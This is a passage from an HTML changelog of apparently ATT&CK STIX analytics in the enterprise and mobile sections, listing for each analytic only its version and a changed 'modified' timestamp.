collapse;'>2026-04-24 20:32:42.659000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.381000+00:00</td></tr></tbody></table></details><hr><h4>[AN1372] Analytic 1372</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:31:55.528000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.378000+00:00</td></tr></tbody></table></details><hr><h4>[AN1373] Analytic 1373</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:33:43.898000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.383000+00:00</td></tr></tbody></table></details><hr><h4>[AN1374] Analytic 1374</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:33:32.261000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.383000+00:00</td></tr></tbody></table></details><hr><h4>[AN1452] Analytic 1452</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-13 22:32:32.447000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.378000+00:00</td></tr></tbody></table></details><hr><h4>[AN1612] Analytic 1612</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-13 22:22:07.647000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.383000+00:00</td></tr></tbody></table></details><hr><h4>[AN1614] Analytic 1614</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-13 22:24:28.695000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details><hr><h4>[AN1615] Analytic 1615</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-13 22:30:14.543000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.378000+00:00</td></tr></tbody></table></details><hr><h4>[AN1616] Analytic 1616</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-13 22:29:39.660000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.382000+00:00</td></tr></tbody></table></details><hr><h4>[AN1617] Analytic 1617</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-13 22:28:56.147000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.382000+00:00</td></tr></tbody></table></details><hr><h4>[AN2033] Analytic 2033</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:33:42.205000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.383000+00:00</td></tr></tbody></table></details><hr><h4>[AN2034] Analytic 2034</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:33:35.460000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.383000+00:00</td></tr></tbody></table></details><hr><h4>[AN2035] Analytic 2035</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:32:37.936000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.380000+00:00</td></tr></tbody></table></details><hr><h4>[AN2036] Analytic 2036</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:33:48.643000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.384000+00:00</td></tr></tbody></table></details><hr><h4>[AN2037] Analytic 2037</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:31:48.301000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.378000+00:00</td></tr></tbody></table></details><hr><h4>[AN2038] Analytic 2038</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:32:20.041000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.379000+00:00</td></tr></tbody></table></details><hr><h4>[AN2039] Analytic 2039</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:33:08.936000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.382000+00:00</td></tr></tbody></table></details><hr><h4>[AN2040] Analytic 2040</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:32:41.903000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.381000+00:00</td></tr></tbody></table></details><hr><h4>[AN2041] Analytic 2041</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:31:38.954000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.377000+00:00</td></tr></tbody></table></details><hr><h4>[AN2042] Analytic 2042</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:33:44.123000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.384000+00:00</td></tr></tbody></table></details><hr><h4>[AN2043] Analytic 2043</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:32:08.148000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.378000+00:00</td></tr></tbody></table></details><hr><h4>[AN2044] Analytic 2044</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:31:16.812000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details><hr><h4>[AN2059] Analytic 2059</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 21:02:59.794000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details><hr><h4>[AN2060] Analytic 2060</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 21:03:04.099000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details><hr><h4>[AN2061] Analytic 2061</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 21:02:57.004000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details><hr><h4>[AN2062] Analytic 2062</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 21:02:46.916000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details></details><h3>mobile-attack</h3><details><summary>Patches</summary><hr><h4>[AN1644] Analytic 1644</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:30:18.846000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details><hr><h4>[AN1645] Analytic 1645</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-09 16:57:33.679000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.381000+00:00</td></tr></tbody></table></details><hr><h4>[AN1646] Analytic 1646</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-29 20:03:14.269000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.380000+00:00</td></tr></tbody></table></details><hr><h4>[AN1647] Analytic 1647</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-29 20:27:08.190000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.382000+00:00</td></tr></tbody></table></details><hr><h4>[AN1648] Analytic 1648</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-02-23 17:40:11.076000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.378000+00:00</td></tr></tbody></table></details><hr><h4>[AN1649] Analytic 1649</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-02-23 17:42:33.331000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.375000+00:00</td></tr></tbody></table></details><hr><h4>[AN1650] Analytic 1650</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-23 17:35:57.553000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.381000+00:00</td></tr></tbody></table></details><hr><h4>[AN1652] Analytic 1652</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:30:31.921000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.381000+00:00</td></tr></tbody></table></details><hr><h4>[AN1653] Analytic 1653</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-16 21:48:51.316000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.381000+00:00</td></tr></tbody></table></details><hr><h4>[AN1654] Analytic 1654</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-16 22:10:25.735000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.378000+00:00</td></tr></tbody></table></details><hr><h4>[AN1657] Analytic 1657</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-09 20:47:35.790000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.383000+00:00</td></tr></tbody></table></details><hr><h4>[AN1658] Analytic 1658</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-09 20:52:16.713000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.378000+00:00</td></tr></tbody></table></details><hr><h4>[AN1663] Analytic 1663</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-19 15:15:16.075000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.382000+00:00</td></tr></tbody></table></details><hr><h4>[AN1664] Analytic 1664</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-19 15:26:39.271000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.383000+00:00</td></tr></tbody></table></details><hr><h4>[AN1665] Analytic 1665</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-01 14:50:46.895000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.377000+00:00</td></tr></tbody></table></details><hr><h4>[AN1666] Analytic 1666</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-30 16:54:01.193000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.382000+00:00</td></tr></tbody></table></details><hr><h4>[AN1669] Analytic 1669</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-09 17:32:52.483000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.376000+00:00</td></tr></tbody></table></details><hr><h4>[AN1670] Analytic 1670</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-09 17:36:14.306000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.383000+00:00</td></tr></tbody></table></details><hr><h4>[AN1675] Analytic 1675</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-17 20:48:31.295000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.379000+00:00</td></tr></tbody></table></details><hr><h4>[AN1676] Analytic 1676</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-17 20:56:49.928000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.381000+00:00</td></tr></tbody></table></details><hr><h4>[AN1677] Analytic 1677</h4><p><b>Current version</b>: 